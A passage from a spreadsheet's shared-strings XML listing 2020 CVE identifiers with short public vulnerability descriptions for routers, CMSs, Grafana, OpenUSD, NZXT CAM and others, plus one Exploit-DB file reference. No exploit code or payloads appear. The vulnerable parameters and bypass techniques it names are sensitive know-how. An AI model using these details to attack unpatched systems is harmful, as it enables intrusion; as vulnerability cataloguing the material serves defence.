    <t>Monstra CMS 3.0.4 allows remote authenticated users to upload and execute arbitrary PHP code via admin/index.php?id=filesmanager because, for example, .php filenames are blocked but .php7 filenames are not, a related issue to CVE-2017-18048.</t>
  </si>
  <si>
    <t>CVE-2020-13386</t>
  </si>
  <si>
    <t>In SmartDraw 2020 27.0.0.0, the installer gives inherited write permissions to the Authenticated Users group on the SmartDraw 2020 installation folder. Additionally, when the product is installed, two scheduled tasks are created on the machine, SDMsgUpdate (Local) and SDMsgUpdate (TE). The scheduled tasks run in the context of the user who installed the product. Both scheduled tasks attempt to run the same binary, C:\SmartDraw 2020\Messages\SDNotify.exe. The folder Messages doesn't exist by default and (by extension) neither does SDNotify.exe. Due to the weak folder permissions, these can be created by any user. A malicious actor can therefore create a malicious SDNotify.exe binary, and have it automatically run, whenever the user who installed the product logs on to the machine. The malicious SDNotify.exe could, for example, create a new local administrator account on the machine.</t>
  </si>
  <si>
    <t>CVE-2020-13387</t>
  </si>
  <si>
    <t>Pexip Infinity before 23.4 has a lack of input validation, leading to temporary denial of service via H.323.</t>
  </si>
  <si>
    <t>CVE-2020-13388</t>
  </si>
  <si>
    <t>An exploitable vulnerability exists in the configuration-loading functionality of the jw.util package before 2.3 for Python. When loading a configuration with FromString or FromStream with YAML, one can execute arbitrary Python code, resulting in OS command execution, because safe_load is not used.</t>
  </si>
  <si>
    <t>CVE-2020-13389</t>
  </si>
  <si>
    <t>An issue was discovered on Tenda AC6 V1.0 V15.03.05.19_multi_TD01, AC9 V1.0 V15.03.05.19(6318)_CN, AC9 V3.0 V15.03.06.42_multi, AC15 V1.0 V15.03.05.19_multi_TD01, and AC18 V15.03.05.19(6318_)_CN devices. There is a buffer overflow vulnerability in the router's web server -- httpd. While processing the /goform/openSchedWifi schedStartTime and schedEndTime parameters for a POST request, a value is directly used in a strcpy to a local variable placed on the stack, which overwrites the return address of a function. An attacker can construct a payload to carry out arbitrary code execution attacks.</t>
  </si>
  <si>
    <t>CVE-2020-1339</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists when Windows Media Audio Codec improperly handles objects, aka 'Windows Media Remote Code Execution Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-13390</t>
  </si>
  <si>
    <t>An issue was discovered on Tenda AC6 V1.0 V15.03.05.19_multi_TD01, AC9 V1.0 V15.03.05.19(6318)_CN, AC9 V3.0 V15.03.06.42_multi, AC15 V1.0 V15.03.05.19_multi_TD01, and AC18 V15.03.05.19(6318_)_CN devices. There is a buffer overflow vulnerability in the router's web server -- httpd. While processing the /goform/addressNat entrys and mitInterface parameters for a POST request, a value is directly used in a sprintf to a local variable placed on the stack, which overwrites the return address of a function. An attacker can construct a payload to carry out arbitrary code execution attacks.</t>
  </si>
  <si>
    <t>CVE-2020-13391</t>
  </si>
  <si>
    <t>An issue was discovered on Tenda AC6 V1.0 V15.03.05.19_multi_TD01, AC9 V1.0 V15.03.05.19(6318)_CN, AC9 V3.0 V15.03.06.42_multi, AC15 V1.0 V15.03.05.19_multi_TD01, and AC18 V15.03.05.19(6318_)_CN devices. There is a buffer overflow vulnerability in the router's web server -- httpd. While processing the /goform/SetSpeedWan speed_dir parameter for a POST request, a value is directly used in a sprintf to a local variable placed on the stack, which overwrites the return address of a function. An attacker can construct a payload to carry out arbitrary code execution attacks.</t>
  </si>
  <si>
    <t>CVE-2020-13392</t>
  </si>
  <si>
    <t>An issue was discovered on Tenda AC6 V1.0 V15.03.05.19_multi_TD01, AC9 V1.0 V15.03.05.19(6318)_CN, AC9 V3.0 V15.03.06.42_multi, AC15 V1.0 V15.03.05.19_multi_TD01, and AC18 V15.03.05.19(6318_)_CN devices. There is a buffer overflow vulnerability in the router's web server -- httpd. While processing the /goform/setcfm funcpara1 parameter for a POST request, a value is directly used in a sprintf to a local variable placed on the stack, which overwrites the return address of a function. An attacker can construct a payload to carry out arbitrary code execution attacks.</t>
  </si>
  <si>
    <t>CVE-2020-13393</t>
  </si>
  <si>
    <t>An issue was discovered on Tenda AC6 V1.0 V15.03.05.19_multi_TD01, AC9 V1.0 V15.03.05.19(6318)_CN, AC9 V3.0 V15.03.06.42_multi, AC15 V1.0 V15.03.05.19_multi_TD01, and AC18 V15.03.05.19(6318_)_CN devices. There is a buffer overflow vulnerability in the router's web server -- httpd. While processing the /goform/saveParentControlInfo deviceId and time parameters for a POST request, a value is directly used in a strcpy to a local variable placed on the stack, which overwrites the return address of a function. An attacker can construct a payload to carry out arbitrary code execution attacks.</t>
  </si>
  <si>
    <t>CVE-2020-13394</t>
  </si>
  <si>
    <t>An issue was discovered on Tenda AC6 V1.0 V15.03.05.19_multi_TD01, AC9 V1.0 V15.03.05.19(6318)_CN, AC9 V3.0 V15.03.06.42_multi, AC15 V1.0 V15.03.05.19_multi_TD01, and AC18 V15.03.05.19(6318_)_CN devices. There is a buffer overflow vulnerability in the router's web server -- httpd. While processing the /goform/SetNetControlList list parameter for a POST request, a value is directly used in a strcpy to a local variable placed on the stack, which overwrites the return address of a function. An attacker can construct a payload to carry out arbitrary code execution attacks.</t>
  </si>
  <si>
    <t>CVE-2020-13396</t>
  </si>
  <si>
    <t>An issue was discovered in FreeRDP before 2.1.1. An out-of-bounds (OOB) read vulnerability has been detected in ntlm_read_ChallengeMessage in winpr/libwinpr/sspi/NTLM/ntlm_message.c.</t>
  </si>
  <si>
    <t>CVE-2020-13397</t>
  </si>
  <si>
    <t>An issue was discovered in FreeRDP before 2.1.1. An out-of-bounds (OOB) read vulnerability has been detected in security_fips_decrypt in libfreerdp/core/security.c due to an uninitialized value.</t>
  </si>
  <si>
    <t>CVE-2020-13398</t>
  </si>
  <si>
    <t>An issue was discovered in FreeRDP before 2.1.1. An out-of-bounds (OOB) write vulnerability has been detected in crypto_rsa_common in libfreerdp/crypto/crypto.c.</t>
  </si>
  <si>
    <t>CVE-2020-1340</t>
  </si>
  <si>
    <t>A spoofing vulnerability exists when the NuGetGallery does not properly sanitize input on package metadata values, aka 'NuGetGallery Spoofing Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-13401</t>
  </si>
  <si>
    <t>An issue was discovered in Docker Engine before 19.03.11. An attacker in a container, with the CAP_NET_RAW capability, can craft IPv6 router advertisements, and consequently spoof external IPv6 hosts, obtain sensitive information, or cause a denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-13404</t>
  </si>
  <si>
    <t>The ATOS/Sips (aka Atos-Magento) community module 3.0.0 to 3.0.5 for Magento allows command injection.</t>
  </si>
  <si>
    <t>CVE-2020-13405</t>
  </si>
  <si>
    <t>userfiles/modules/users/controller/controller.php in Microweber before 1.1.20 allows an unauthenticated user to disclose the users database via a /modules/ POST request.</t>
  </si>
  <si>
    <t>CVE-2020-13407</t>
  </si>
  <si>
    <t>Tufin SecureTrack &lt; R20-2 GA contains reflected + stored XSS (as in, the value is reflected back to the user, but is also stored within the DB and can be later triggered again by the same victim, or also later by different users). Both stored, and reflected payloads are triggerable by admin, so malicious non-authenticated user could get admin level access. Even malicious low-privileged user can inject XSS, which can be executed by admin, potentially elevating privileges and obtaining admin access. (issue 1 of 3)</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:A/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L</t>
  </si>
  <si>
    <t>CVE-2020-13408</t>
  </si>
  <si>
    <t>Tufin SecureTrack &lt; R20-2 GA contains reflected + stored XSS (as in, the value is reflected back to the user, but is also stored within the DB and can be later triggered again by the same victim, or also later by different users). Both stored, and reflected payloads are triggerable by admin, so malicious non-authenticated user could get admin level access. Even malicious low-privileged user can inject XSS, which can be executed by admin, potentially elevating privileges and obtaining admin access. (issue 2 of 3)</t>
  </si>
  <si>
    <t>CVE-2020-13409</t>
  </si>
  <si>
    <t>Tufin SecureTrack &lt; R20-2 GA contains reflected + stored XSS (as in, the value is reflected back to the user, but is also stored within the DB and can be later triggered again by the same victim, or also later by different users). Both stored, and reflected payloads are triggerable by admin, so malicious non-authenticated user could get admin level access. Even malicious low-privileged user can inject XSS, which can be executed by admin, potentially elevating privileges and obtaining admin access. (issue 3 of 3)</t>
  </si>
  <si>
    <t>CVE-2020-13410</t>
  </si>
  <si>
    <t>An issue was discovered in MoscaJS Aedes 0.42.0. lib/write.js does not properly consider exceptions during the writing of an invalid packet to a stream.</t>
  </si>
  <si>
    <t>CVE-2020-13412</t>
  </si>
  <si>
    <t>An issue was discovered in Aviatrix Controller before 5.4.1204. An API call on the web interface lacked a session token check to control access, leading to CSRF.</t>
  </si>
  <si>
    <t>CVE-2020-13413</t>
  </si>
  <si>
    <t>An issue was discovered in Aviatrix Controller before 5.4.1204. There is a Observable Response Discrepancy from the API, which makes it easier to perform user enumeration via brute force.</t>
  </si>
  <si>
    <t>CVE-2020-13414</t>
  </si>
  <si>
    <t>An issue was discovered in Aviatrix Controller before 5.4.1204. It contains credentials unused by the software.</t>
  </si>
  <si>
    <t>CVE-2020-13415</t>
  </si>
  <si>
    <t>An issue was discovered in Aviatrix Controller through 5.1. An attacker with any signed SAML assertion from the Identity Provider can establish a connection (even if that SAML assertion has expired or is from a user who is not authorized to access Aviatrix), aka XML Signature Wrapping.</t>
  </si>
  <si>
    <t>CVE-2020-13416</t>
  </si>
  <si>
    <t>An issue was discovered in Aviatrix Controller before 5.4.1066. A Controller Web Interface session token parameter is not required on an API call, which opens the application up to a Cross Site Request Forgery (CSRF) vulnerability for password resets.</t>
  </si>
  <si>
    <t>CVE-2020-13417</t>
  </si>
  <si>
    <t>An Elevation of Privilege issue was discovered in Aviatrix VPN Client before 2.10.7, because of an incomplete fix for CVE-2020-7224. This affects Linux, macOS, and Windows installations for certain OpenSSL parameters.</t>
  </si>
  <si>
    <t>CVE-2020-13418</t>
  </si>
  <si>
    <t>OpenIAM before 4.2.0.3 allows XSS in the Add New User feature.</t>
  </si>
  <si>
    <t>CVE-2020-13419</t>
  </si>
  <si>
    <t>OpenIAM before 4.2.0.3 allows Directory Traversal in the Batch task.</t>
  </si>
  <si>
    <t>CVE-2020-1342</t>
  </si>
  <si>
    <t>An information disclosure vulnerability exists when Microsoft Office software reads out of bound memory due to an uninitialized variable, which could disclose the contents of memory, aka 'Microsoft Office Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2020-1445.</t>
  </si>
  <si>
    <t>CVE-2020-13420</t>
  </si>
  <si>
    <t>OpenIAM before 4.2.0.3 allows remote attackers to execute arbitrary code via Groovy Script.</t>
  </si>
  <si>
    <t>CVE-2020-13421</t>
  </si>
  <si>
    <t>OpenIAM before 4.2.0.3 has Incorrect Access Control for the Create User, Modify User Permissions, and Password Reset actions.</t>
  </si>
  <si>
    <t>CVE-2020-13422</t>
  </si>
  <si>
    <t>OpenIAM before 4.2.0.3 does not verify if a user has permissions to perform /webconsole/rest/api/* administrative actions.</t>
  </si>
  <si>
    <t>CVE-2020-13423</t>
  </si>
  <si>
    <t>Form Builder 2.1.0 for Magento has multiple XSS issues that can be exploited against Magento 2 admin accounts via the Current_url or email field, or the User-Agent HTTP header.</t>
  </si>
  <si>
    <t>CVE-2020-13424</t>
  </si>
  <si>
    <t>The XCloner component before 3.5.4 for Joomla! allows Authenticated Local File Disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-13425</t>
  </si>
  <si>
    <t>TrackR devices through 2020-05-06 allow attackers to trigger the Beep (aka alarm) feature, which will eventually cause a denial of service when battery capacity is exhausted.</t>
  </si>
  <si>
    <t>CVE-2020-13426</t>
  </si>
  <si>
    <t>The Multi-Scheduler plugin 1.0.0 for WordPress has a Cross-Site Request Forgery (CSRF) vulnerability in the forms it presents, allowing the possibility of deleting records (users) when an ID is known.</t>
  </si>
  <si>
    <t>CVE-2020-13427</t>
  </si>
  <si>
    <t>Victor CMS 1.0 has Persistent XSS in admin/users.php?source=add_user via the user_name, user_firstname, or user_lastname parameter.</t>
  </si>
  <si>
    <t>CVE-2020-13428</t>
  </si>
  <si>
    <t>A heap-based buffer overflow in the hxxx_AnnexB_to_xVC function in modules/packetizer/hxxx_nal.c in VideoLAN VLC media player before 3.0.11 for macOS/iOS allows remote attackers to cause a denial of service (application crash) or execute arbitrary code via a crafted H.264 Annex-B video (.avi for example) file.</t>
  </si>
  <si>
    <t>CVE-2020-13429</t>
  </si>
  <si>
    <t>legend.ts in the piechart-panel (aka Pie Chart Panel) plugin before 1.5.0 for Grafana allows XSS via the Values Header (aka legend header) option.</t>
  </si>
  <si>
    <t>CVE-2020-1343</t>
  </si>
  <si>
    <t>An information disclosure vulnerability exists in Visual Studio Code Live Share Extension when it exposes tokens in plain text, aka 'Visual Studio Code Live Share Information Disclosure Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-13430</t>
  </si>
  <si>
    <t>Grafana before 7.0.0 allows tag value XSS via the OpenTSDB datasource.</t>
  </si>
  <si>
    <t>CVE-2020-13431</t>
  </si>
  <si>
    <t>I2P before 0.9.46 allows local users to gain privileges via a Trojan horse I2PSvc.exe file because of weak permissions on a certain %PROGRAMFILES% subdirectory.</t>
  </si>
  <si>
    <t>CVE-2020-13432</t>
  </si>
  <si>
    <t>rejetto HFS (aka HTTP File Server) v2.3m Build #300, when virtual files or folders are used, allows remote attackers to trigger an invalid-pointer write access violation via concurrent HTTP requests with a long URI or long HTTP headers.</t>
  </si>
  <si>
    <t>CVE-2020-13433</t>
  </si>
  <si>
    <t>Jason2605 AdminPanel 4.0 allows SQL Injection via the editPlayer.php hidden parameter.</t>
  </si>
  <si>
    <t>CVE-2020-13434</t>
  </si>
  <si>
    <t>SQLite through 3.32.0 has an integer overflow in sqlite3_str_vappendf in printf.c.</t>
  </si>
  <si>
    <t>CVE-2020-13435</t>
  </si>
  <si>
    <t>SQLite through 3.32.0 has a segmentation fault in sqlite3ExprCodeTarget in expr.c.</t>
  </si>
  <si>
    <t>CVE-2020-13438</t>
  </si>
  <si>
    <t>ffjpeg through 2020-02-24 has an invalid read in jfif_encode in jfif.c.</t>
  </si>
  <si>
    <t>CVE-2020-13439</t>
  </si>
  <si>
    <t>ffjpeg through 2020-02-24 has a heap-based buffer over-read in jfif_decode in jfif.c.</t>
  </si>
  <si>
    <t>CVE-2020-1344</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in the way that the Windows WalletService handles objects in memory, aka 'Windows WalletService Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1362, CVE-2020-1369.</t>
  </si>
  <si>
    <t>exploits/php/webapps/48536.py</t>
  </si>
  <si>
    <t>QuickBox Pro 2.1.8 - Authenticated Remote Code Execution</t>
  </si>
  <si>
    <t>CVE-2020-13440</t>
  </si>
  <si>
    <t>ffjpeg through 2020-02-24 has an invalid write in bmp_load in bmp.c.</t>
  </si>
  <si>
    <t>CVE-2020-13442</t>
  </si>
  <si>
    <t>A Remote code execution vulnerability exists in DEXT5Upload in DEXT5 through 2.7.1402870. An attacker can upload a PHP file via dext5handler.jsp handler because the uploaded file is stored under dext5uploadeddata/.</t>
  </si>
  <si>
    <t>CVE-2020-13443</t>
  </si>
  <si>
    <t>ExpressionEngine before 5.3.2 allows remote attackers to upload and execute arbitrary code in a .php%20 file via Compose Msg, Add attachment, and Save As Draft actions. A user with low privileges (member) is able to upload this. It is possible to bypass the MIME type check and file-extension check while uploading new files. Short aliases are not used for an attachment; instead, direct access is allowed to the uploaded files. It is possible to upload PHP only if one has member access, or registration/forum is enabled and one can create a member with the default group id of 5. To exploit this, one must to be able to send and compose messages (at least).</t>
  </si>
  <si>
    <t>CVE-2020-13444</t>
  </si>
  <si>
    <t>Liferay Portal 7.x before 7.3.2, and Liferay DXP 7.0 before fix pack 92, 7.1 before fix pack 18, and 7.2 before fix pack 5 does not sanitize the information returned by the DDMDataProvider API, which allows remote authenticated users to obtain the password to REST Data Providers.</t>
  </si>
  <si>
    <t>CVE-2020-13445</t>
  </si>
  <si>
    <t>In Liferay Portal before 7.3.2 and Liferay DXP 7.0 before fix pack 92, 7.1 before fix pack 18, and 7.2 before fix pack 6, the template API does not restrict user access to sensitive objects, which allows remote authenticated users to execute arbitrary code via crafted FreeMarker and Velocity templates.</t>
  </si>
  <si>
    <t>CVE-2020-13448</t>
  </si>
  <si>
    <t>QuickBox Community Edition through 2.5.5 and Pro Edition through 2.1.8 allows an authenticated remote attacker to execute code on the server via command injection in the servicestart parameter.</t>
  </si>
  <si>
    <t>CVE-2020-13449</t>
  </si>
  <si>
    <t>A directory traversal vulnerability in the Markdown engine of Gotenberg through 6.2.1 allows an attacker to read any container files.</t>
  </si>
  <si>
    <t>CVE-2020-1345</t>
  </si>
  <si>
    <t>A cross-site-scripting (XSS) vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server, aka 'Microsoft Office SharePoint XSS Vulnerability'. This CVE ID is unique from CVE-2020-1198, CVE-2020-1227, CVE-2020-1482, CVE-2020-1514, CVE-2020-1575.</t>
  </si>
  <si>
    <t>CVE-2020-13450</t>
  </si>
  <si>
    <t>A directory traversal vulnerability in file upload function of Gotenberg through 6.2.1 allows an attacker to upload and overwrite any writable files outside the intended folder. This can lead to DoS, a change to program behavior, or code execution.</t>
  </si>
  <si>
    <t>CVE-2020-13451</t>
  </si>
  <si>
    <t>An incomplete-cleanup vulnerability in the Office rendering engine of Gotenberg through 6.2.1 allows an attacker to overwrite LibreOffice configuration files and execute arbitrary code via macros.</t>
  </si>
  <si>
    <t>CVE-2020-13452</t>
  </si>
  <si>
    <t>In Gotenberg through 6.2.1, insecure permissions for tini (writable by user gotenberg) potentially allow an attacker to overwrite the file, which can lead to denial of service or code execution.</t>
  </si>
  <si>
    <t>CVE-2020-13458</t>
  </si>
  <si>
    <t>An issue was discovered in the Image Resizer plugin before 2.0.9 for Craft CMS. There are CSRF issues with the log-clear controller action.</t>
  </si>
  <si>
    <t>CVE-2020-13459</t>
  </si>
  <si>
    <t>An issue was discovered in the Image Resizer plugin before 2.0.9 for Craft CMS. There is stored XSS in the Bulk Resize action.</t>
  </si>
  <si>
    <t>CVE-2020-1346</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Modules Installer improperly handles file operations, aka 'Windows Modules Installer Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-13460</t>
  </si>
  <si>
    <t>Multiple Cross-Site Request Forgery (CSRF) vulnerabilities were present in Tufin SecureTrack, affecting all versions prior to R20-2 GA.</t>
  </si>
  <si>
    <t>CVE-2020-13461</t>
  </si>
  <si>
    <t>Username enumeration in present in Tufin SecureTrack. It's affecting all versions of SecureTrack. The vendor has decided not to fix this vulnerability. Vendor's response: "This attack requires access to the internal network. If an attacker is part of the internal network, they do not require access to TOS to know the usernames".</t>
  </si>
  <si>
    <t>CVE-2020-13462</t>
  </si>
  <si>
    <t>Insecure Direct Object Reference (IDOR) exists in Tufin SecureChange, affecting all versions prior to R20-2 GA. Fixed in version R20-2 GA.</t>
  </si>
  <si>
    <t>CVE-2020-13463</t>
  </si>
  <si>
    <t>The flash memory readout protection in Apex Microelectronics APM32F103 devices allows physical attackers to extract firmware via the debug interface and exception handling.</t>
  </si>
  <si>
    <t>CVE-2020-13464</t>
  </si>
  <si>
    <t>The flash memory readout protection in China Key Systems &amp; Integrated Circuit CKS32F103 devices allows physical attackers to extract firmware via the debug interface by utilizing the CPU or DMA module.</t>
  </si>
  <si>
    <t>CVE-2020-13465</t>
  </si>
  <si>
    <t>The security protection in Gigadevice GD32F103 devices allows physical attackers to redirect the control flow and execute arbitrary code via the debug interface.</t>
  </si>
  <si>
    <t>CVE-2020-13466</t>
  </si>
  <si>
    <t>STMicroelectronics STM32F103 devices through 2020-05-20 allow physical attackers to execute arbitrary code via a power glitch and a specific flash patch/breakpoint unit configuration.</t>
  </si>
  <si>
    <t>CVE-2020-13467</t>
  </si>
  <si>
    <t>The flash memory readout protection in China Key Systems &amp; Integrated Circuit CKS32F103 devices allows physical attackers to extract firmware via the debug interface and exception handling.</t>
  </si>
  <si>
    <t>CVE-2020-13468</t>
  </si>
  <si>
    <t>Gigadevice GD32F130 devices allow physical attackers to escalate their debug interface permissions via fault injection into inter-IC bonding wires (which have insufficient physical protection).</t>
  </si>
  <si>
    <t>CVE-2020-13469</t>
  </si>
  <si>
    <t>The flash memory readout protection in Gigadevice GD32VF103 devices allows physical attackers to extract firmware via the debug interface by utilizing the CPU.</t>
  </si>
  <si>
    <t>CVE-2020-1347</t>
  </si>
  <si>
    <t>CVE-2020-13470</t>
  </si>
  <si>
    <t>Gigadevice GD32F103 and GD32F130 devices allow physical attackers to extract data via the probing of easily accessible bonding wires and de-obfuscation of the observed data.</t>
  </si>
  <si>
    <t>CVE-2020-13471</t>
  </si>
  <si>
    <t>Apex Microelectronics APM32F103 devices allow physical attackers to execute arbitrary code via a power glitch and a specific flash patch/breakpoint unit configuration.</t>
  </si>
  <si>
    <t>CVE-2020-13472</t>
  </si>
  <si>
    <t>The flash memory readout protection in Gigadevice GD32F103 devices allows physical attackers to extract firmware via the debug interface by utilizing the DMA module.</t>
  </si>
  <si>
    <t>CVE-2020-13473</t>
  </si>
  <si>
    <t>NCH Express Accounts 8.24 and earlier allows local users to discover the cleartext password by reading the configuration file.</t>
  </si>
  <si>
    <t>CVE-2020-13474</t>
  </si>
  <si>
    <t>In NCH Express Accounts 8.24 and earlier, an authenticated low-privilege user can enter a crafted URL to access higher-privileged functionalities such as Add/Edit users.</t>
  </si>
  <si>
    <t>CVE-2020-13476</t>
  </si>
  <si>
    <t>NCH Express Invoice 8.06 to 8.24 is vulnerable to Reflected XSS in the Quotes List module.</t>
  </si>
  <si>
    <t>CVE-2020-1348</t>
  </si>
  <si>
    <t>CVE-2020-13480</t>
  </si>
  <si>
    <t>Verint Workforce Optimization (WFO) 15.2 allows HTML injection via the "send email" feature.</t>
  </si>
  <si>
    <t>CVE-2020-13482</t>
  </si>
  <si>
    <t>EM-HTTP-Request 1.1.5 uses the library eventmachine in an insecure way that allows an attacker to perform a man-in-the-middle attack against users of the library. The hostname in a TLS server certificate is not verified.</t>
  </si>
  <si>
    <t>CVE-2020-13483</t>
  </si>
  <si>
    <t>The Web Application Firewall in Bitrix24 through 20.0.0 allows XSS via the items[ITEMS][ID] parameter to the components/bitrix/mobileapp.list/ajax.php/ URI.</t>
  </si>
  <si>
    <t>CVE-2020-13484</t>
  </si>
  <si>
    <t>Bitrix24 through 20.0.975 allows SSRF via an intranet IP address in the services/main/ajax.php?action=attachUrlPreview url parameter, if the destination URL hosts an HTML document containing '&lt;meta name="og:image" content="' followed by an intranet URL.</t>
  </si>
  <si>
    <t>CVE-2020-13485</t>
  </si>
  <si>
    <t>The Knock Knock plugin before 1.2.8 for Craft CMS allows IP Whitelist bypass via an X-Forwarded-For HTTP header.</t>
  </si>
  <si>
    <t>CVE-2020-13486</t>
  </si>
  <si>
    <t>The Knock Knock plugin before 1.2.8 for Craft CMS allows malicious redirection.</t>
  </si>
  <si>
    <t>CVE-2020-13487</t>
  </si>
  <si>
    <t>The bbPress plugin through 2.6.4 for WordPress has stored XSS in the Forum creation section, resulting in JavaScript execution at wp-admin/edit.php?post_type=forum (aka the Forum listing page) for all users. An administrator can exploit this at the wp-admin/post.php?action=edit URI.</t>
  </si>
  <si>
    <t>CVE-2020-1349</t>
  </si>
  <si>
    <t>CVE-2020-13493</t>
  </si>
  <si>
    <t>A heap overflow vulnerability exists in Pixar OpenUSD 20.05 when the software parses compressed sections in binary USD files. A specially crafted USDC file format path jumps decompression heap overflow in a way path jumps are processed. To trigger this vulnerability, the victim needs to open an attacker-provided malformed file.</t>
  </si>
  <si>
    <t>CVE-2020-13494</t>
  </si>
  <si>
    <t>A heap overflow vulnerability exists in the Pixar OpenUSD 20.05 parsing of compressed string tokens in binary USD files. A specially crafted malformed file can trigger a heap overflow which can result in out of bounds memory access which could lead to information disclosure. This vulnerability could be used to bypass mitigations and aid further exploitation. To trigger this vulnerability, victim needs to access an attacker-provided malformed file.</t>
  </si>
  <si>
    <t>CVE-2020-13495</t>
  </si>
  <si>
    <t>An exploitable vulnerability exists in the way Pixar OpenUSD 20.05 handles file offsets in binary USD files. A specially crafted malformed file can trigger an arbitrary out-of-bounds memory access that could lead to the disclosure of sensitive information. This vulnerability could be used to bypass mitigations and aid additional exploitation. To trigger this vulnerability, the victim needs to access an attacker-provided file.</t>
  </si>
  <si>
    <t>CVE-2020-13496</t>
  </si>
  <si>
    <t>An exploitable vulnerability exists in the way Pixar OpenUSD 20.05 handles parses certain encoded types. A specially crafted malformed file can trigger an arbitrary out of bounds memory access in TfToken Type Index. This vulnerability could be used to bypass mitigations and aid further exploitation. To trigger this vulnerability, the victim needs to access an attacker-provided malformed file.</t>
  </si>
  <si>
    <t>CVE-2020-13497</t>
  </si>
  <si>
    <t>An exploitable vulnerability exists in the way Pixar OpenUSD 20.05 handles parses certain encoded types. A specially crafted malformed file can trigger an arbitrary out of bounds memory access in String Type Index. This vulnerability could be used to bypass mitigations and aid further exploitation. To trigger this vulnerability, the victim needs to access an attacker-provided malformed file.</t>
  </si>
  <si>
    <t>CVE-2020-13498</t>
  </si>
  <si>
    <t>An exploitable vulnerability exists in the way Pixar OpenUSD 20.05 handles parses certain encoded types. A specially crafted malformed file can trigger an arbitrary out of bounds memory access which could lead to information disclosure. This vulnerability could be used to bypass mitigations and aid further exploitation. To trigger this vulnerability, the victim needs to access an attacker-provided malformed file.</t>
  </si>
  <si>
    <t>CVE-2020-13499</t>
  </si>
  <si>
    <t>An SQL injection vulnerability exists in the CHaD.asmx web service functionality of eDNA Enterprise Data Historian 3.0.1.2/7.5.4989.33053. Specially crafted SOAP web requests can cause SQL injections resulting in data compromise. Parameter InstancePath in CHaD.asmx is vulnerable to unauthenticated SQL injection attacks.</t>
  </si>
  <si>
    <t>CVE-2020-1350</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in Windows Domain Name System servers when they fail to properly handle requests, aka 'Windows DNS Server Remote Code Execution Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-13500</t>
  </si>
  <si>
    <t>SQL injection vulnerability exists in the CHaD.asmx web service functionality of eDNA Enterprise Data Historian 3.0.1.2/7.5.4989.33053. Specially crafted SOAP web requests can cause SQL injections resulting in data compromise. Parameter ClassName in CHaD.asmx is vulnerable to unauthenticated SQL injection attacks.</t>
  </si>
  <si>
    <t>CVE-2020-13501</t>
  </si>
  <si>
    <t>An SQL injection vulnerability exists in the CHaD.asmx web service functionality of eDNA Enterprise Data Historian 3.0.1.2/7.5.4989.33053. Specially crafted SOAP web requests can cause SQL injections resulting in data compromise. Parameter InstanceName in CHaD.asmx is vulnerable to unauthenticated SQL injection attacks.</t>
  </si>
  <si>
    <t>CVE-2020-13504</t>
  </si>
  <si>
    <t>Parameter AttFilterValue in ednareporting.asmx is vulnerable to unauthenticated SQL injection attacks. Specially crafted SOAP web requests can cause SQL injections resulting in data compromise. An attacker can send unauthenticated HTTP requests to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-13505</t>
  </si>
  <si>
    <t>Parameter psClass in ednareporting.asmx is vulnerable to unauthenticated SQL injection attacks. Specially crafted SOAP web requests can cause SQL injections resulting in data compromise. An attacker can send unauthenticated HTTP requests to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-13509</t>
  </si>
  <si>
    <t>An information disclosure vulnerability exists in the WinRing0x64 Driver Privileged I/O Read IRPs functionality of NZXT CAM 4.8.0. A specially crafted I/O request packet (IRP) Using the IRP 0x9c4060cc gives a low privilege user direct access to the IN instruction that is completely unrestrained at an elevated privilege level. An attacker can send a malicious IRP to trigger this vulnerability and this access could allow for information leakage of sensitive data.</t>
  </si>
  <si>
    <t>CVE-2020-1351</t>
  </si>
  <si>
    <t>An information disclosure vulnerability exists when the Windows Graphics component improperly handles objects in memory, aka 'Microsoft Graphics Component Information Disclosure Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-13510</t>
  </si>
  <si>
    <t>An information disclosure vulnerability exists in the WinRing0x64 Driver Privileged I/O Read IRPs functionality of NZXT CAM 4.8.0. A specially crafted I/O request packet (IRP) using the IRP 0x9c4060d0 gives a low privilege user direct access to the IN instruction that is completely unrestrained at an elevated privilege level. An attacker can send a malicious IRP to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-13511</t>
  </si>
  <si>
    <t>An information disclosure vulnerability exists in the WinRing0x64 Driver Privileged I/O Read IRPs functionality of NZXT CAM 4.8.0. A specially crafted I/O request packet (IRP) using the IRP 0x9c4060d4 gives a low privilege user direct access to the IN instruction that is completely unrestrained at an elevated privilege level. An attacker can send a malicious IRP to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-13512</t>
  </si>
  <si>
    <t>A privilege escalation vulnerability exists in the WinRing0x64 Driver Privileged I/O Write IRPs functionality of NZXT CAM 4.8.0. A specially crafted I/O request packet (IRP) can cause increased privileges. Using the IRP 0x9c40a0d8 gives a low privilege user direct access to the OUT instruction that is completely unrestrained at an elevated privilege level. An attacker can send a malicious IRP to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-13513</t>
  </si>
  <si>
    <t>A privilege escalation vulnerability exists in the WinRing0x64 Driver Privileged I/O Write IRPs functionality of NZXT CAM 4.8.0. A specially crafted I/O request packet (IRP) can cause increased privileges. Using the IRP 0x9c40a0dc gives a low privilege user direct access to the OUT instruction that is completely unrestrained at an elevated privilege level. An attacker can send a malicious IRP to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-13514</t>
  </si>
  <si>
